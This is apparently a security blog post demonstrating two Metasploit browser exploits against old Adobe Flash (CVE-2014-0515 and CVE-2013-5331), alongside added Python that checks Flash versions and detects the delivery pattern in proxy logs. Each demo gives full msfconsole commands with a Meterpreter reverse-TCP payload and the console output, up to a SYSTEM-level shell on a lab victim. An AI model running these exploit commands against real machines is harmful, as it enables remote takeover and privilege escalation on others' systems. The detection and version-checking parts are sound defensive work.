Metasploit CVE-2014-0515 Demo

Description:
This module exploits a buffer overflow vulnerability in Adobe Flash
Player. The vulnerability occurs in the flash.Display.Shader class,
when setting specially crafted data as its bytecode, as exploited in
the wild in April 2014. This module has been tested successfully on
IE 6 to IE 10 with Flash 11 and Flash 12 over Windows XP SP3,
Windows 7 SP1 and Windows 8.

References:
http://cvedetails.com/cve/2014-0515/
http://www.securityfocus.com/bid/67092
http://helpx.adobe.com/security/products/flash-player/apsb14-13.html
http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks
http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/

use exploit/windows/browser/adobe_flash_pixel_bender_bof
set SRVHOST 192.168.2.23
set SRVPORT 80
set URIPATH 2014-0515
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.23
exploit

[*] Started reverse handler on 192.168.2.23:4444
[*] Using URL: http://192.168.2.23:80/2014-0515
[*] Server started.
[*] 192.168.2.25 adobe_flash_pixel_bender_bof - Gathering target information.
[*] 192.168.2.25 adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 192.168.2.25 adobe_flash_pixel_bender_bof - Request: /2014-0515/RKdcju/
[*] 192.168.2.25 adobe_flash_pixel_bender_bof - Sending HTML...
[*] 192.168.2.25 adobe_flash_pixel_bender_bof - Request: /2014-0515/RKdcju/bEonsn.swf
[*] 192.168.2.25 adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (770048 bytes) to 192.168.2.25
[*] Meterpreter session 1 opened (192.168.2.23:4444 -> 192.168.2.25:2915) at 2014-05-15 18:56:16 -0400
[*] Session ID 1 (192.168.2.23:4444 -> 192.168.2.25:2915) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2120)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2180
[+] Successfully migrated to process

sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: VICTIM-PC\victim
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Metasploit CVE-2013-5331 Demo

Description:
This module exploits a type confusion vulnerability found in the ActiveX component of Adobe Flash Player. This vulnerability was found exploited in the wild in November 2013. This module has been tested successfully on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170.

References:
http://helpx.adobe.com/security/products/flash-player/apsb13-28.html
http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html
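Both module descriptions tie exploitability to the Flash build: the CVE-2013-5331 module above is tested on 11.7, 11.8 and 11.9 prior to 11.9.900.170, and the CVE-2014-0515 module on Flash 11 and 12. The Python below is an added example, not part of the original post and not code from the Metasploit modules. It parses a Flash version string (including the "WIN 11,9,900,152" form that flash.system.Capabilities.version returns in the browser), compares it numerically instead of as text, and reports which of the two CVEs the build sits below the fix for. The 11.9.900.170 threshold comes from the page; the 13.0.0.206 threshold for CVE-2014-0515 is taken from the referenced Adobe bulletin APSB14-13 rather than from the page.

```python
import re

# Fixed builds on the mainline Windows/Mac branch.
# 11.9.900.170 is the threshold stated in the CVE-2013-5331 module description;
# 13.0.0.206 is the fix level from the referenced Adobe bulletin APSB14-13 (not from the page).
FIXED = {
    "CVE-2013-5331": (11, 9, 900, 170),
    "CVE-2014-0515": (13, 0, 0, 206),
}

VERSION_RE = re.compile(r"(\d+)[.,](\d+)[.,](\d+)[.,](\d+)")


def parse_flash_version(text):
    """Accept '11.9.900.152', '11,9,900,152' or the Capabilities.version
    form 'WIN 11,9,900,152' and return a 4-tuple of ints."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"not a Flash version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def vulnerable_to(version_text, fixed=FIXED):
    """Return the sorted list of CVE ids whose fix level is above the given build.

    Tuples of ints compare field by field, so 11.10.x.x correctly sorts above
    11.9.x.x; a plain string comparison would get that backwards."""
    build = parse_flash_version(version_text)
    return sorted(cve for cve, fix in fixed.items() if build < fix)


if __name__ == "__main__":
    # Constructed inputs for the example: a build from the tested range and a patched one.
    for sample in ("WIN 11,9,900,152", "12.0.0.77", "13.0.0.182", "13.0.0.206"):
        print(sample, "->", vulnerable_to(sample) or "not below either fix")
```

One threshold per CVE is only right for the mainline branch. Adobe shipped parallel extended-support and Linux branches with their own fix levels in the same bulletins, so a fleet check has to carry a threshold per branch, and a build below 11.9.900.170 on a branch that was patched separately is not necessarily exposed.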


use exploit/windows/browser/adobe_flash_filters_type_confusion
set SRVHOST 192.168.2.23
set SRVPORT 80
set URIPATH 2013-5331
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.23
exploit
[*] Exploit running as background job.
msf exploit(adobe_flash_filters_type_confusion) >
[*] Started reverse handler on 192.168.2.23:4444
[*] Using URL: http://192.168.2.23:80/2013-5331
[*] Server started.
[*] 192.168.2.25 adobe_flash_filters_type_confusion - Gathering target information.
[*] 192.168.2.25 adobe_flash_filters_type_confusion - Sending response HTML.
[*] 192.168.2.25 adobe_flash_filters_type_confusion - Request: /2013-5331/GzqJRB/
[*] 192.168.2.25 adobe_flash_filters_type_confusion - Sending HTML...
[*] 192.168.2.25 adobe_flash_filters_type_confusion - showme the money
[*] 192.168.2.25 adobe_flash_filters_type_confusion - Request: /2013-5331/GzqJRB/jUBO.swf
[*] 192.168.2.25 adobe_flash_filters_type_confusion - Sending SWF...
[*] Sending stage (769536 bytes) to 192.168.2.25
[*] Meterpreter session 1 opened (192.168.2.23:4444 -> 192.168.2.25:1096) at 2014-04-30 20:03:46 -0400
[*] Session ID 1 (192.168.2.23:4444 -> 192.168.2.25:1096) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2392)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2888
[+] Successfully migrated to process
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: VICTIM-PC\victim
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
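Both transcripts show the same delivery pattern on the wire: the victim fetches the base URI, gets sent to a randomly named directory under it (/2014-0515/RKdcju/, /2013-5331/GzqJRB/), and within a couple of seconds pulls a randomly named .swf from that same directory. The Python below is an added example, not from the original post and not the way the Metasploit modules themselves work: it looks for that HTML-then-SWF pairing in proxy logs. The log lines are constructed for the example; the first three mirror the requests in the first transcript, the rest are benign filler, and the "time client method url status content-type" layout is an assumption about the proxy's log format.

```python
import re
from datetime import datetime
from urllib.parse import urlparse

# Constructed proxy log, not from the original page.
# Fields: time client method url status content-type
SAMPLE_LOG = """\
2014-05-15T18:55:58 192.168.2.25 GET http://192.168.2.23/2014-0515 200 text/html
2014-05-15T18:56:01 192.168.2.25 GET http://192.168.2.23/2014-0515/RKdcju/ 200 text/html
2014-05-15T18:56:03 192.168.2.25 GET http://192.168.2.23/2014-0515/RKdcju/bEonsn.swf 200 application/x-shockwave-flash
2014-05-15T18:57:10 192.168.2.30 GET http://cdn.example.org/player/v3/player.swf 200 application/x-shockwave-flash
2014-05-15T18:58:00 192.168.2.31 GET http://intranet.example.org/docs/Reports/ 200 text/html
2014-05-15T19:20:05 192.168.2.31 GET http://intranet.example.org/docs/Reports/chart.swf 200 application/x-shockwave-flash
"""

# Shape of the random directory and file names seen in the transcripts (RKdcju, bEonsn, GzqJRB, jUBO).
# On its own this matches plenty of legitimate names; the pairing below is what carries the signal.
TOKEN = re.compile(r"^[A-Za-z]{4,8}$")


def parse_line(line):
    ts, client, method, url, status, ctype = line.split()
    parts = urlparse(url)
    return {
        "ts": datetime.fromisoformat(ts),
        "client": client,
        "host": parts.netloc,
        "path": parts.path,
        "ctype": ctype,
    }


def find_flash_delivery(log_text, window_seconds=120):
    """Flag each (client, host, directory) where the client fetched an HTML page from a
    random-looking directory and then a random-looking .swf from the same directory
    within window_seconds. Returns one dict per hit."""
    records = sorted(
        (parse_line(line) for line in log_text.splitlines() if line.strip()),
        key=lambda r: r["ts"],
    )
    landing = {}  # (client, host, directory) -> time the HTML landing page was fetched
    findings = []
    for r in records:
        path = r["path"]
        if r["ctype"] == "text/html" and path.endswith("/"):
            segments = path.rstrip("/").split("/")
            if segments and TOKEN.match(segments[-1]):
                landing[(r["client"], r["host"], path)] = r["ts"]
        elif r["ctype"] == "application/x-shockwave-flash" or path.endswith(".swf"):
            directory, _, fname = path.rpartition("/")
            stem = fname[:-4] if fname.endswith(".swf") else fname
            key = (r["client"], r["host"], directory + "/")
            if TOKEN.match(stem) and key in landing:
                delta = (r["ts"] - landing[key]).total_seconds()
                if 0 <= delta <= window_seconds:
                    findings.append({
                        "client": r["client"],
                        "host": r["host"],
                        "dir": directory + "/",
                        "swf": fname,
                        "seconds_after_html": delta,
                    })
    return findings


if __name__ == "__main__":
    for hit in find_flash_delivery(SAMPLE_LOG):
        print(f"{hit['client']} fetched {hit['swf']} from {hit['host']}{hit['dir']} "
              f"{hit['seconds_after_html']:.0f}s after the landing page")
```

The CDN request is not flagged because no landing page from that directory preceded it, and the intranet pair is not flagged because the .swf came 22 minutes later. Neither check is strong alone: random-looking names are common, and a landing page can precede a legitimate player. The combination of same client, same host, same short directory and a sub-window gap is what makes this worth an alert, and a real deployment would add the iexplore.exe -> notepad.exe process migration seen in both transcripts as endpoint corroboration.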